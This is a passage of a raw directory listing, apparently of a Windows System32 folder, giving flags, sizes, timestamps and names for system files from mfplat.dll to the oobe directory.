2100056 03/07/2020 00:54:26 mfplat.dll +F 543352 09/15/2018 09:09:59 MFPlay.dll +F 50616 09/15/2018 09:10:01 mfpmp.exe +F 263576 03/07/2020 00:54:26 mfps.dll +F 1282944 03/07/2020 00:54:26 mfreadwrite.dll +F 335888 09/15/2018 07:29:21 mfsensorgroup.dll +F 1876960 03/07/2020 00:54:26 mfsrcsnk.dll +F 1296360 03/07/2020 00:54:26 mfsvr.dll +F 473304 09/15/2018 09:09:58 mftranscode.dll +F 96760 09/15/2018 09:09:59 mfvdsp.dll +F 44544 09/15/2018 09:09:54 mfvfw.dll +F 463872 09/15/2018 09:10:05 MFWMAAEC.DLL +F 23040 09/15/2018 07:28:57 mgmtapi.dll +F 114688 09/15/2018 07:29:25 mgmtrefreshcredprov.dll +F 125440 09/15/2018 07:28:29 mi.dll +F 90624 09/15/2018 07:28:29 mibincodec.dll +D 0 03/07/2020 10:34:47 Microsoft +F 209408 09/15/2018 07:28:30 Microsoft-Windows-AppModelExecEvents.dll +F 12288 09/15/2018 07:29:24 microsoft-windows-battery-events.dll +F 6656 09/15/2018 07:29:24 microsoft-windows-hal-events.dll +F 167424 09/15/2018 07:28:26 Microsoft-Windows-Internal-Shell-NearShareExperience.dll +F 43008 09/15/2018 07:29:24 microsoft-windows-kernel-pnp-events.dll +F 270336 09/15/2018 07:29:24 microsoft-windows-kernel-power-events.dll +F 128000 03/07/2020 00:54:17 microsoft-windows-kernel-processor-power-events.dll +F 113664 09/15/2018 07:28:34 Microsoft-Windows-MapControls.dll +F 8192 09/15/2018 07:28:34 Microsoft-Windows-MosHost.dll +F 72192 09/15/2018 07:29:24 microsoft-windows-pdc.dll +F 10240 09/15/2018 07:28:22 microsoft-windows-power-cad-events.dll +F 4096 09/15/2018 07:29:24 microsoft-windows-processor-aggregator-events.dll +F 6656 09/15/2018 07:29:23 microsoft-windows-sleepstudy-events.dll +F 6144 09/15/2018 07:28:42 microsoft-windows-storage-tiering-events.dll +F 434688 09/15/2018 07:28:46 microsoft-windows-system-events.dll +F 2560 09/15/2018 07:28:34 Microsoft-WindowsPhone-SEManagementProvider.dll +F 268800 09/15/2018 07:28:38 Microsoft.Bluetooth.Proxy.dll +F 3630592 03/07/2020 00:53:43 Microsoft.Bluetooth.Service.dll +F 491520 03/07/2020 00:53:31 Microsoft.Bluetooth.UserService.dll +F 914432 03/07/2020 00:54:08 Microsoft.Graphics.Display.DisplayEnhancementService.dll +F 17920 09/15/2018 07:29:56 Microsoft.Management.Infrastructure.Native.Unmanaged.dll +F 13824 09/15/2018 09:10:00 Microsoft.Uev.AgentDriverEvents.dll +F 2426680 03/07/2020 00:53:30 Microsoft.Uev.AppAgent.dll +F 54272 09/15/2018 09:10:03 Microsoft.Uev.CabUtil.dll +F 214016 09/15/2018 09:10:03 Microsoft.Uev.CmUtil.dll +F 70656 03/07/2020 00:53:30 Microsoft.Uev.Common.dll +F 18944 09/15/2018 09:10:03 Microsoft.Uev.Common.WinRT.dll +F 1184256 03/07/2020 00:53:30 Microsoft.Uev.CommonBridge.dll +F 281088 03/07/2020 00:53:30 Microsoft.Uev.ConfigWrapper.dll +F 422912 03/07/2020 00:53:30 Microsoft.Uev.CscUnpinTool.exe +F 47104 09/15/2018 09:10:03 Microsoft.Uev.EventLogMessages.dll +F 17920 09/15/2018 09:10:03 Microsoft.Uev.LocalSyncProvider.dll +F 287744 09/15/2018 09:10:03 Microsoft.Uev.ManagedEventLogging.dll +F 22016 09/15/2018 09:10:03 Microsoft.Uev.Management.dll +F 23552 09/15/2018 09:10:03 Microsoft.Uev.Management.WmiAccess.dll +F 2158592 03/07/2020 00:53:30 Microsoft.Uev.ModernAppAgent.dll +F 58880 03/07/2020 00:53:30 Microsoft.Uev.ModernAppCore.dll +F 20992 09/15/2018 09:10:03 Microsoft.Uev.ModernAppData.WinRT.dll +F 14336 09/15/2018 09:10:03 Microsoft.Uev.ModernSync.dll +F 8192 09/15/2018 09:10:03 Microsoft.Uev.MonitorSyncProvider.dll +F 45056 09/15/2018 09:09:56 Microsoft.Uev.Office2010CustomActions.dll +F 740864 03/07/2020 00:53:30 Microsoft.Uev.Office2013CustomActions.dll +F 762880 03/07/2020 00:53:30 Microsoft.Uev.PrinterCustomActions.dll +F 11264 09/15/2018 09:10:03 Microsoft.Uev.SmbSyncProvider.dll +F 19456 09/15/2018 09:10:03 Microsoft.Uev.SyncCommon.dll +F 7680 09/15/2018 09:10:03 Microsoft.Uev.SyncConditions.dll +F 83456 09/15/2018 09:10:03 Microsoft.Uev.SyncController.exe +F 271872 03/07/2020 00:53:36 MicrosoftAccountCloudAP.dll +F 413184 03/07/2020 00:53:36 MicrosoftAccountExtension.dll +F 227840 03/07/2020 00:53:36 MicrosoftAccountTokenProvider.dll +F 460288 03/07/2020 00:53:36 MicrosoftAccountWAMExtension.dll +F 104960 09/15/2018 07:28:24 MicrosoftEdgeBCHost.exe +F 104960 09/15/2018 07:28:50 MicrosoftEdgeCP.exe +F 104960 09/15/2018 07:28:22 MicrosoftEdgeDevTools.exe +F 57344 09/15/2018 07:28:32 MicrosoftEdgeSH.exe +F 25600 09/15/2018 07:28:22 midimap.dll +F 142848 09/15/2018 07:28:58 migisol.dll +D 0 03/07/2020 00:55:54 migration +F 183808 09/15/2018 07:29:16 miguiresource.dll +D 0 03/07/2020 00:55:54 migwiz +F 39936 09/15/2018 07:28:57 mimefilt.dll +F 158208 09/15/2018 07:28:29 mimofcodec.dll +F 12288 09/15/2018 07:28:42 MinstoreEvents.dll +F 302592 09/15/2018 07:28:50 mintdh.dll +F 37376 09/15/2018 07:28:38 MiracastInputMgr.dll +F 1315328 03/07/2020 00:54:09 MiracastReceiver.dll +F 37888 09/15/2018 07:29:22 MirrorDrvCompat.dll +F 3656704 03/07/2020 00:54:08 mispace.dll +F 83968 09/15/2018 07:28:58 MitigationConfiguration.dll +F 245248 09/15/2018 07:28:29 miutils.dll +F 673088 09/15/2018 07:28:54 mlang.dat +F 248832 09/15/2018 07:28:54 mlang.dll +F 1860096 09/15/2018 07:29:20 mmc.exe +F 3103 09/15/2018 07:31:36 mmc.exe.config +F 341504 09/15/2018 07:29:20 mmcbase.dll +F 64000 09/15/2018 07:28:22 mmci.dll +F 15872 09/15/2018 07:28:22 mmcico.dll +F 2895872 09/15/2018 07:29:19 mmcndmgr.dll +F 128512 09/15/2018 07:29:20 mmcshext.dll +F 443368 03/07/2020 00:53:31 MMDevAPI.dll +F 2100224 09/15/2018 07:28:36 mmgaclient.dll +F 155648 09/15/2018 07:28:36 mmgaproxystub.dll +F 1544192 09/15/2018 07:28:36 mmgaserver.exe +F 9569280 09/15/2018 07:28:42 mmres.dll +F 1001472 03/07/2020 00:53:51 mmsys.cpl +F 21504 09/15/2018 07:28:34 mobilenetworking.dll +F 98816 09/15/2018 07:29:22 mobsync.exe +F 31232 09/15/2018 07:29:16 mode.com +F 184320 09/15/2018 07:29:23 modemui.dll +F 518656 03/07/2020 00:53:37 modernexecserver.dll +F 28672 09/15/2018 07:29:14 more.com +F 185344 09/15/2018 07:29:21 moricons.dll +F 91648 09/15/2018 07:28:34 moshost.dll +F 93184 09/15/2018 07:28:34 MosHostClient.dll +F 246584 03/07/2020 00:53:42 moshostcore.dll +F 86016 09/15/2018 07:28:34 MosStorage.dll +F 18432 09/15/2018 07:29:14 mountvol.exe +F 1386 09/15/2018 07:28:22 MouseSystemToastIcon.contrast-white.png +F 1087 09/15/2018 07:28:22 MouseSystemToastIcon.png +F 103824 09/15/2018 09:10:03 MP3DMOD.DLL +F 238640 09/15/2018 09:09:57 MP43DECD.DLL +F 360008 09/15/2018 09:10:04 MP4SDECD.DLL +F 101888 09/15/2018 07:29:23 Mpeg2Data.ax +F 234496 09/15/2018 07:29:21 mpeval.dll +F 260096 09/15/2018 07:29:24 mpg2splt.ax +F 239664 09/15/2018 09:10:03 MPG4DECD.DLL +F 19456 03/07/2020 00:53:52 mpnotify.exe +F 98664 03/07/2020 00:53:28 mpr.dll +F 517120 09/15/2018 07:28:57 mprapi.dll +F 888832 03/07/2020 00:53:45 mprddm.dll +F 500736 09/15/2018 07:28:57 mprdim.dll +F 13824 09/15/2018 07:28:55 mprext.dll +F 115200 09/15/2018 07:28:57 mprmsg.dll +F 748816 03/29/2020 10:37:41 MpSigStub.exe +F 1052160 03/07/2020 00:53:40 MPSSVC.dll +F 490496 09/15/2018 07:29:20 mpunits.dll +F 16896 09/15/2018 07:29:14 MRINFO.EXE +F 1069176 09/15/2018 07:28:36 MrmCoreR.dll +F 392992 09/15/2018 07:28:36 MrmDeploy.dll +F 861696 09/15/2018 07:28:53 MrmIndexer.dll +F 31904 09/15/2018 07:28:34 mrt100.dll +F 33440 09/15/2018 07:28:34 mrt_map.dll +F 56320 09/15/2018 07:28:57 ms3dthumbnailprovider.dll +F 165888 09/15/2018 07:28:56 msaatext.dll +F 246272 09/15/2018 09:10:00 MSAC3ENC.DLL +F 107408 09/15/2018 07:28:20 msacm32.dll +F 29184 09/15/2018 07:28:22 msacm32.drv +F 34800 09/15/2018 07:28:20 msadp32.acm +F 3072 09/15/2018 07:28:26 msafd.dll +F 3233792 09/15/2018 07:28:30 MSAJApi.dll +F 57344 09/15/2018 09:09:59 MSAlacDecoder.dll +F 74240 09/15/2018 09:09:54 MSAlacEncoder.dll +F 133120 09/15/2018 09:09:58 MSAMRNBDecoder.dll +F 209408 09/15/2018 09:09:58 MSAMRNBEncoder.dll +F 28672 09/15/2018 09:09:58 MSAMRNBSink.dll +F 93696 09/15/2018 09:09:58 MSAMRNBSource.dll +F 54272 03/07/2020 00:53:37 MSAProfileNotificationHandler.dll +F 63552 09/15/2018 07:28:46 msasn1.dll +F 421688 03/07/2020 00:54:27 MSAudDecMFT.dll +F 155136 09/15/2018 07:28:46 msaudite.dll +F 23040 03/07/2020 00:53:43 msauserext.dll +F 304640 09/15/2018 07:28:44 mscandui.dll +F 11776 09/15/2018 07:28:50 mscat32.dll +F 82944 09/15/2018 07:28:53 MSchedExe.exe +F 231424 09/15/2018 07:31:36 msclmd.dll +F 686080 03/07/2020 00:53:39 mscms.dll +F 184320 09/15/2018 07:29:20 msconfig.exe +F 378880 09/15/2018 07:29:33 mscoree.dll +F 19968 09/15/2018 07:29:33 mscorier.dll +F 73864 09/15/2018 07:29:33 mscories.dll +F 1484384 03/07/2020 00:53:51 msctf.dll +F 10752 09/15/2018 07:28:44 msctfime.ime +F 87040 03/07/2020 00:53:53 MsCtfMonitor.dll +F 218112 09/15/2018 07:28:44 msctfp.dll +F 120320 09/15/2018 07:28:44 msctfui.dll +F 1890816 03/07/2020 00:53:53 msctfuimanager.dll +F 160256 09/15/2018 07:29:19 msdadiag.dll +F 136192 09/15/2018 07:28:52 msdart.dll +F 5120 09/15/2018 07:29:19 msdatsrc.tlb +F 516408 09/15/2018 07:28:51 msdelta.dll +F 34088 09/15/2018 07:28:20 msdmo.dll +D 0 09/15/2018 07:34:01 MSDRM +F 560128 09/15/2018 07:28:26 msdrm.dll +F 1562624 09/15/2018 07:29:23 msdt.exe +D 0 09/15/2018 07:34:01 MsDtc +F 148480 09/15/2018 07:29:16 msdtc.exe +F 372224 09/15/2018 07:29:16 msdtckrm.dll +F 128000 09/15/2018 07:29:14 msdtclog.dll +F 864256 09/15/2018 07:29:14 msdtcprx.dll +F 15360 09/15/2018 07:29:14 msdtcspoffln.dll +F 1604096 09/15/2018 07:29:14 msdtctm.dll +F 322048 09/15/2018 07:29:14 msdtcuiu.dll +F 22528 09/15/2018 07:28:42 msdtcVSp1res.dll +F 77824 09/15/2018 07:29:23 MSDvbNP.ax +F 7168 09/15/2018 09:08:37 msdxm.ocx +F 44032 09/15/2018 09:08:37 msdxm.tlb +F 791040 03/07/2020 00:54:15 msfeeds.dll +F 96256 03/07/2020 00:54:15 msfeedsbs.dll +F 15360 09/15/2018 07:29:18 msfeedssync.exe +F 427520 03/07/2020 00:54:27 MSFlacDecoder.dll +F 273920 03/07/2020 00:54:24 MSFlacEncoder.dll +F 3329536 03/07/2020 00:53:37 msftedit.dll +F 56832 09/15/2018 07:28:58 MsftOemDllIgneous.dll +F 26112 09/15/2018 09:10:03 msg.exe +F 25824 09/15/2018 07:28:20 msg711.acm +F 42904 09/15/2018 07:28:20 msgsm32.acm +F 36864 09/15/2018 09:09:56 MSHEIF.dll +F 14848 09/15/2018 07:29:18 mshta.exe +F 23463424 03/07/2020 00:54:14 mshtml.dll +F 2755584 09/15/2018 07:29:18 mshtml.tlb +F 83968 09/15/2018 07:29:18 MshtmlDac.dll +F 97792 09/15/2018 07:29:16 mshtmled.dll +F 49152 09/15/2018 07:29:17 mshtmler.dll +F 4664320 03/07/2020 00:54:15 msi.dll +F 44032 09/15/2018 07:29:23 MsiCofire.dll +F 15360 09/15/2018 07:28:53 msidcrl40.dll +F 63488 09/15/2018 07:28:53 msident.dll +F 11776 09/15/2018 07:28:53 msidle.dll +F 5120 09/15/2018 07:28:53 msidntld.dll +F 322048 09/15/2018 07:28:25 msieftp.dll +F 67072 03/07/2020 00:54:15 msiexec.exe +F 407552 09/15/2018 07:29:20 msihnd.dll +F 21504 09/15/2018 07:29:20 msiltcfg.dll +F 8192 09/15/2018 07:28:46 msimg32.dll +F 26112 09/15/2018 07:29:18 msimsg.dll +F 50688 09/15/2018 07:28:44 msimtf.dll +F 367104 09/15/2018 07:29:24 msinfo32.exe +F 30208 03/07/2020 00:54:15 msisip.dll +F 309760 03/07/2020 00:53:57 msIso.dll +F 12288 09/15/2018 07:29:19 msiwer.dll +F 187392 09/15/2018 07:28:30 mskeyprotcli.dll +F 62976 09/15/2018 07:28:30 mskeyprotect.dll +F 214016 09/15/2018 07:28:57 msls31.dll +F 1057976 03/07/2020 00:54:27 msmpeg2adec.dll +F 933376 09/15/2018 09:10:03 MSMPEG2ENC.DLL +F 2469432 03/07/2020 00:54:27 msmpeg2vdec.dll +F 257024 09/15/2018 07:29:23 MSNP.ax +F 63488 09/15/2018 07:28:46 msobjs.dll +F 114176 09/15/2018 07:29:20 msoert2.dll +F 159744 09/15/2018 09:09:58 MSOpusDecoder.dll +F 6784512 09/15/2018 07:28:53 mspaint.exe +F 55096 09/15/2018 07:28:51 mspatcha.dll +F 82944 09/15/2018 07:28:51 mspatchc.dll +F 1634304 09/15/2018 09:09:59 MSPhotography.dll +F 54784 09/15/2018 07:29:22 msports.dll +F 2560 09/15/2018 07:28:46 msprivs.dll +F 587776 09/15/2018 07:29:47 msra.exe +F 136192 09/15/2018 07:29:47 msrahc.dll +F 7680 09/15/2018 07:29:47 MsraLegacy.tlb +F 12288 09/15/2018 07:28:50 msrating.dll +F 181760 09/15/2018 07:29:21 msrdc.dll +F 62464 09/15/2018 07:29:23 MsRdpWebAccess.dll +F 17920 09/15/2018 07:29:22 msrle32.dll +F 72704 03/07/2020 00:53:39 msscntrs.dll +F 101888 03/07/2020 00:54:25 mssecuser.dll +F 74752 09/15/2018 07:28:50 mssign32.dll +F 10240 09/15/2018 07:28:51 mssip32.dll +F 128512 09/15/2018 07:28:34 mssitlb.dll +F 909824 03/07/2020 00:53:46 MsSpellCheckingFacility.dll +F 81920 09/15/2018 07:29:46 MsSpellCheckingHost.exe +F 198656 03/07/2020 00:53:39 mssph.dll +F 146432 03/07/2020 00:53:39 mssprxy.dll +F 2848768 03/07/2020 00:53:39 mssrch.dll +F 817664 03/07/2020 00:53:39 mssvp.dll +F 249856 09/15/2018 07:28:45 mstask.dll +F 585728 09/15/2018 07:29:22 msTextPrediction.dll +F 3690496 03/07/2020 00:54:17 mstsc.exe +F 8907776 03/07/2020 00:54:17 mstscax.dll +F 501760 03/07/2020 00:53:53 msutb.dll +F 461840 03/07/2020 00:53:26 msv1_0.dll +F 83968 09/15/2018 07:28:45 msvcirt.dll +F 560576 09/15/2018 07:28:22 msvcp110_win.dll +F 690008 09/15/2018 07:29:51 msvcp120_clr0400.dll +F 627368 02/16/2017 16:45:12 msvcp140.dll +F 612864 09/15/2018 07:28:45 msvcp60.dll +F 646632 03/07/2020 00:53:26 msvcp_win.dll +F 19080 09/15/2018 07:29:50 msvcr100_clr0400.dll +F 993632 09/15/2018 07:29:48 msvcr120_clr0400.dll +F 638376 03/07/2020 00:53:54 msvcrt.dll +F 143872 09/15/2018 07:29:22 msvfw32.dll +F 39424 09/15/2018 07:29:22 msvidc32.dll +F 3406848 03/07/2020 00:54:16 MSVidCtl.dll +F 719968 09/15/2018 09:09:54 MSVideoDSP.dll +F 43888 09/15/2018 09:09:59 MSVP9DEC.dll +F 1459080 03/07/2020 00:54:26 msvproc.dll +F 43888 09/15/2018 09:09:57 MSVPXENC.dll +F 255312 09/15/2018 07:28:29 MSWB7.dll +F 35328 09/15/2018 09:10:00 MSWebp.dll +F 424448 09/15/2018 09:10:04 mswmdm.dll +F 408800 03/07/2020 00:53:26 mswsock.dll +F 1886208 03/07/2020 00:53:43 msxml3.dll +F 2560 09/15/2018 07:28:53 msxml3r.dll +F 2437344 03/07/2020 00:53:40 msxml6.dll +F 2560 09/15/2018 07:28:36 msxml6r.dll +F 27648 09/15/2018 07:29:21 msyuv.dll +F 218112 09/15/2018 07:28:41 MtcModel.dll +F 276496 03/07/2020 00:53:28 MTF.dll +F 102400 03/07/2020 00:53:31 MTFAppServiceDS.dll +F 321536 03/07/2020 00:53:31 MtfDecoder.dll +F 158720 03/07/2020 00:53:31 MTFFuzzyDS.dll +F 259072 09/15/2018 07:28:53 MTFServer.dll +F 109056 03/07/2020 00:53:31 MTFSpellcheckDS.dll +F 135168 09/15/2018 07:28:42 mtstocom.exe +F 424960 09/15/2018 07:29:16 mtxclu.dll +F 32768 09/15/2018 07:28:42 mtxdm.dll +F 9728 09/15/2018 07:28:42 mtxex.dll +F 145408 09/15/2018 07:29:16 mtxoci.dll +D 0 09/15/2018 09:07:52 MUI +F 18432 09/15/2018 07:28:50 muifontsetup.dll +F 16384 09/15/2018 07:28:53 MUILanguageCleanup.dll +F 103424 03/07/2020 00:53:55 MuiUnattend.exe +F 53760 09/15/2018 07:29:22 MultiDigiMon.exe +F 145408 03/07/2020 00:53:29 musdialoghandlers.dll +F 591872 03/07/2020 00:53:29 MusNotification.exe +F 442880 03/07/2020 00:53:29 MusNotificationUx.exe +F 376784 03/07/2020 00:53:29 MusNotifyIcon.exe +F 985088 03/07/2020 00:53:29 MusUpdateHandlers.dll +D 0 09/15/2018 07:34:01 my-mm +F 264192 09/15/2018 07:29:16 mycomput.dll +F 161280 09/15/2018 07:28:44 mydocs.dll +F 152576 09/15/2018 07:29:22 Mystify.scr +F 50688 03/07/2020 00:54:15 NAPCRYPT.DLL +F 68096 09/15/2018 07:28:29 NapiNSP.dll +F 399360 03/07/2020 00:53:51 Narrator.exe +F 833024 09/15/2018 07:28:26 NaturalAuth.dll +F 22016 09/15/2018 07:28:26 NaturalAuthClient.dll +F 1059840 09/15/2018 07:28:29 NaturalLanguage6.dll +F 39936 09/15/2018 07:28:32 navshutdown.dll +D 0 09/15/2018 09:09:27 nb-NO +F 21504 09/15/2018 07:28:56 nbtstat.exe +F 25600 09/15/2018 07:28:51 NcaApi.dll +F 175616 03/07/2020 00:53:57 NcaSvc.dll +F 374784 09/15/2018 07:28:34 ncbservice.dll +F 89600 09/15/2018 07:29:24 NcdAutoSetup.dll +F 25600 09/15/2018 07:29:20 NcdProp.dll +F 46080 09/15/2018 07:28:50 nci.dll +F 69632 09/15/2018 07:28:25 ncobjapi.dll +F 102912 09/15/2018 07:28:55 ncpa.cpl +F 145144 09/15/2018 07:28:45 ncrypt.dll +F 346624 03/07/2020 00:53:26 ncryptprov.dll +F 131688 09/15/2018 07:28:46 ncryptsslp.dll +F 516096 03/07/2020 00:53:44 ncsi.dll +F 27136 09/15/2018 07:28:56 ncuprov.dll +F 69120 09/15/2018 07:28:56 ndadmin.exe +F 12288 09/15/2018 07:29:19 nddeapi.dll +D 0 09/15/2018 07:33:50 NDF +F 303616 09/15/2018 07:29:22 ndfapi.dll +F 44032 09/15/2018 07:29:22 ndfetw.dll +F 565 09/15/2018 07:29:22 NdfEventView.xml +F 112640 09/15/2018 07:29:22 ndfhcdiscovery.dll +F 97280 09/15/2018 07:29:24 ndishc.dll +F 32768 09/15/2018 07:29:22 ndproxystub.dll +F 72704 09/15/2018 07:29:13 nduprov.dll +F 115200 03/07/2020 00:53:37 negoexts.dll +F 57344 09/15/2018 07:29:16 net.exe +F 176640 09/15/2018 07:29:14 net1.exe +F 80600 09/15/2018 07:28:29 netapi32.dll +F 18432 09/15/2018 07:28:56 netbios.dll +F 26112 09/15/2018 07:28:55 netbtugc.exe +F 69632 09/15/2018 07:29:25 NetCellcoreCellManagerProviderResources.dll +F 1216512 09/15/2018 07:29:19 netcenter.dll +F 36352 09/15/2018 07:28:51 netcfg.exe +F 78336 09/15/2018 07:28:56 NetCfgNotifyObjectHost.exe +F 101688 09/15/2018 07:28:56 netcfgx.dll +F 460800 09/15/2018 07:29:24 netcorehc.dll +F 316928 09/15/2018 07:29:22 netdiagfx.dll +F 111616 09/15/2018 06:09:27 NetDriverInstall.dll +F 20480 09/15/2018 07:28:53 netevent.dll +F 46080 09/15/2018 07:29:22 NetEvtFwdr.exe +F 106496 09/15/2018 07:29:33 netfxperf.dll +F 2560 09/15/2018 07:29:16 neth.dll +F 10752 09/15/2018 07:28:57 NetHost.exe +F 174592 09/15/2018 07:28:55 netid.dll +F 198144 03/07/2020 00:53:26 netiohlp.dll +F 30208 09/15/2018 07:28:56 netiougc.exe +F 162816 09/15/2018 07:28:56 netjoin.dll +F 869888 03/07/2020 00:53:28 netlogon.dll +F 262656 03/07/2020 00:53:34 netman.dll +F 2560 09/15/2018 07:28:45 netmsg.dll +F 308224 03/07/2020 00:53:53 netplwiz.dll +F 40448 09/15/2018 07:28:44 Netplwiz.exe +F 224256 09/15/2018 07:28:56 netprofm.dll +F 581632 03/07/2020 00:53:45 netprofmsvc.dll +F 64512 09/15/2018 07:28:55 netprovfw.dll +F 70144 09/15/2018 07:28:56 netprovisionsp.dll +F 143880 03/07/2020 00:53:53 NetSetupApi.dll +F 821048 03/07/2020 00:53:53 NetSetupEngine.dll +F 505344 03/07/2020 00:53:44 NetSetupShim.dll +F 332800 03/07/2020 00:53:55 NetSetupSvc.dll +F 93184 09/15/2018 07:29:14 netsh.exe +F 2875904 09/15/2018 07:28:55 netshell.dll +F 289280 03/30/2020 08:52:15 netsrv.exe +F 38400 09/15/2018 07:29:14 NETSTAT.EXE +F 1132032 03/07/2020 00:54:16 nettrace.dll +F 21656 09/15/2018 07:29:23 NetTrace.PLA.Diagnostics.xml +F 44440 09/15/2018 07:28:46 netutils.dll +F 340992 09/15/2018 07:28:56 NetworkBindingEngineMigPlugin.dll +F 695808 09/15/2018 07:29:18 NetworkCollectionAgent.dll +F 236032 09/15/2018 07:28:56 NetworkDesktopSettings.dll +F 1195520 09/15/2018 07:28:50 networkexplorer.dll +F 139776 09/14/2018 18:02:00 networkhelper.dll +F 54784 09/15/2018 07:28:50 networkitemfactory.dll +D 0 09/15/2018 07:33:50 networklist +F 3344896 03/07/2020 00:53:48 NetworkMobileSettings.dll +F 54784 09/15/2018 07:28:50 NetworkProxyCsp.dll +F 127488 09/15/2018 07:28:56 NetworkStatus.dll +F 356864 09/15/2018 07:28:38 NetworkUXBroker.dll +F 12800 09/15/2018 07:28:25 netwphelper.dll +F 523776 03/07/2020 00:53:44 newdev.dll +F 71680 09/15/2018 07:28:56 newdev.exe +F 99840 03/07/2020 00:53:33 NFCProvisioningPlugin.dll +F 52224 09/15/2018 07:28:32 NfcRadioMedia.dll +F 558592 03/07/2020 00:53:42 ngccredprov.dll +F 497152 03/07/2020 00:53:42 NgcCtnr.dll +F 486400 09/15/2018 07:28:46 NgcCtnrGidsHandler.dll +F 621568 03/07/2020 00:53:42 NgcCtnrSvc.dll +F 461488 03/07/2020 00:54:08 NgcIso.exe +F 616960 03/07/2020 00:54:08 NgcIsoCtnr.dll +F 192512 09/15/2018 07:28:36 ngckeyenum.dll +F 124416 09/15/2018 07:28:34 ngcksp.dll +F 76288 09/15/2018 07:28:50 ngclocal.dll +F 190976 03/07/2020 00:53:42 ngcpopkeysrv.dll +F 145920 09/15/2018 07:28:34 NgcProCsp.dll +F 188928 09/15/2018 07:28:36 ngcrecovery.dll +F 782848 03/07/2020 00:53:42 ngcsvc.dll +F 177664 03/07/2020 00:53:46 ngctasks.dll +F 392192 03/07/2020 00:53:52 ninput.dll +D 0 09/15/2018 09:09:27 nl-NL +F 92160 03/07/2020 00:53:44 nlaapi.dll +F 93696 03/07/2020 00:54:17 nlahc.dll +F 385536 03/07/2020 00:53:44 nlasvc.dll +F 191488 09/15/2018 07:28:57 nlhtml.dll +F 175616 09/15/2018 07:28:56 nlmgp.dll +F 29696 09/15/2018 07:28:56 nlmproxy.dll +F 17408 09/15/2018 07:28:56 nlmsprep.dll +F 89600 09/15/2018 07:28:52 nlsbres.dll +F 1565696 09/15/2018 07:29:14 NlsData0000.dll +F 6347776 09/14/2018 17:50:00 NlsData0009.dll +F 10752 09/15/2018 07:28:52 Nlsdl.dll +F 2629120 09/14/2018 18:04:00 NlsLexicons0009.dll +F 525824 03/07/2020 00:54:16 nltest.exe +F 247296 09/15/2018 07:28:34 NmaDirect.dll +F 741 09/15/2018 07:31:36 NOISE.DAT +F 5632 09/15/2018 07:28:46 normaliz.dll +F 80078 09/15/2018 07:28:46 normidna.nls +F 50112 09/15/2018 07:28:46 normnfc.nls +F 43566 09/15/2018 07:28:46 normnfd.nls +F 71824 09/15/2018 07:28:46 normnfkc.nls +F 65698 09/15/2018 07:28:46 normnfkd.nls +F 254464 03/07/2020 00:53:45 notepad.exe +F 1319936 03/07/2020 00:53:50 NotificationController.dll +F 364544 03/07/2020 00:53:50 NotificationControllerPS.dll +F 47616 09/15/2018 07:28:36 notificationplatformcomponent.dll +F 39936 03/07/2020 00:53:45 npmproxy.dll +F 210432 03/07/2020 00:53:41 NPSM.dll +F 872960 03/07/2020 00:53:43 NPSMDesktopProvider.dll +F 18944 09/15/2018 07:28:45 nrpsrv.dll +F 44544 03/07/2020 00:54:11 nshhttp.dll +F 370688 09/15/2018 07:28:50 nshipsec.dll +F 773632 03/07/2020 00:54:15 nshwfp.dll +F 23768 03/07/2020 00:53:54 nsi.dll +F 30720 09/15/2018 07:28:45 nsisvc.dll +F 86528 03/07/2020 00:53:57 nslookup.exe +F 241680 09/15/2018 07:28:45 ntasn1.dll +F 1994768 03/07/2020 00:53:54 ntdll.dll +F 148992 09/15/2018 07:28:29 ntdsapi.dll +F 66048 03/07/2020 00:53:55 ntlanman.dll +F 20480 09/15/2018 07:28:58 ntlanui2.dll +F 39304 03/07/2020 00:53:26 NtlmShared.dll +F 185440 09/15/2018 07:28:46 ntmarta.dll +F 9672208 03/07/2020 00:53:43 ntoskrnl.exe +F 363520 09/15/2018 07:28:57 ntprint.dll +F 64000 09/15/2018 07:28:57 ntprint.exe +F 776192 03/07/2020 00:53:47 ntshrui.dll +F 18944 09/15/2018 07:28:26 ntvdm64.dll +D 0 09/15/2018 07:34:01 Nui +F 663552 03/07/2020 00:54:09 objsel.dll +F 149504 09/15/2018 07:29:18 occache.dll +F 166912 09/15/2018 07:28:43 ocsetapi.dll +F 712192 03/07/2020 00:54:15 odbc32.dll +F 73728 09/15/2018 07:29:19 odbcad32.exe +F 47616 09/15/2018 07:29:20 odbcbcp.dll +F 29696 09/15/2018 07:29:19 odbcconf.dll +F 26112 09/15/2018 07:29:19 odbcconf.exe +F 263 09/15/2018 07:29:19 odbcconf.rsp +F 129024 09/15/2018 07:29:20 odbccp32.dll +F 86528 09/15/2018 07:29:20 odbccr32.dll +F 87040 09/15/2018 07:29:20 odbccu32.dll +F 225280 09/15/2018 07:29:19 odbcint.dll +F 165888 09/15/2018 07:29:19 odbctrac.dll +F 7680 09/15/2018 09:10:06 OEMDefaultAssociations.dll +F 5185 09/15/2018 09:10:06 OEMDefaultAssociations.xml +F 132096 09/15/2018 07:28:29 oemlicense.dll +F 87040 09/15/2018 07:28:24 ofdeploy.exe +F 269824 09/15/2018 07:28:57 offfilt.dll +F 133120 09/15/2018 07:28:24 officecsp.dll +F 131896 09/15/2018 07:28:46 offlinelsa.dll +F 252944 03/07/2020 00:53:26 offlinesam.dll +F 78848 03/07/2020 00:54:16 offreg.dll +F 45568 09/15/2018 07:28:22 oflc-nz.rs +F 423 09/15/2018 07:28:39 OkDone_80.contrast-black.png +F 438 09/15/2018 07:28:39 OkDone_80.contrast-white.png +F 423 09/15/2018 07:28:39 OkDone_80.png +F 1395056 03/07/2020 00:53:50 ole32.dll +F 421376 09/15/2018 07:28:56 oleacc.dll +F 13312 09/15/2018 07:28:56 oleacchooks.dll +F 4608 09/15/2018 07:28:56 oleaccrc.dll +F 793824 03/07/2020 00:53:26 oleaut32.dll +F 184832 03/07/2020 00:53:51 oledlg.dll +F 143872 03/07/2020 00:53:33 oleprn.dll +F 205824 09/15/2018 07:28:22 OmaDmAgent.dll +F 156712 03/07/2020 00:53:58 omadmapi.dll +F 320512 03/07/2020 00:53:58 omadmclient.exe +F 62976 09/15/2018 07:28:50 omadmprc.exe +F 47616 09/15/2018 07:28:34 OnDemandBrokerClient.dll +F 70144 09/15/2018 07:28:29 OnDemandConnRouteHelper.dll +F 359936 09/15/2018 07:28:25 OneBackupHandler.dll +F 470528 09/15/2018 07:28:22 OneCoreCommonProxyStub.dll +F 7656072 03/07/2020 00:53:37 OneCoreUAPCommonProxyStub.dll +F 660480 03/07/2020 00:53:46 OneDriveSettingSyncProvider.dll +F 237056 09/15/2018 07:28:25 onex.dll +F 1081856 09/15/2018 07:28:51 onexui.dll +D 0 03/07/2020 00:55:54 oobe +F 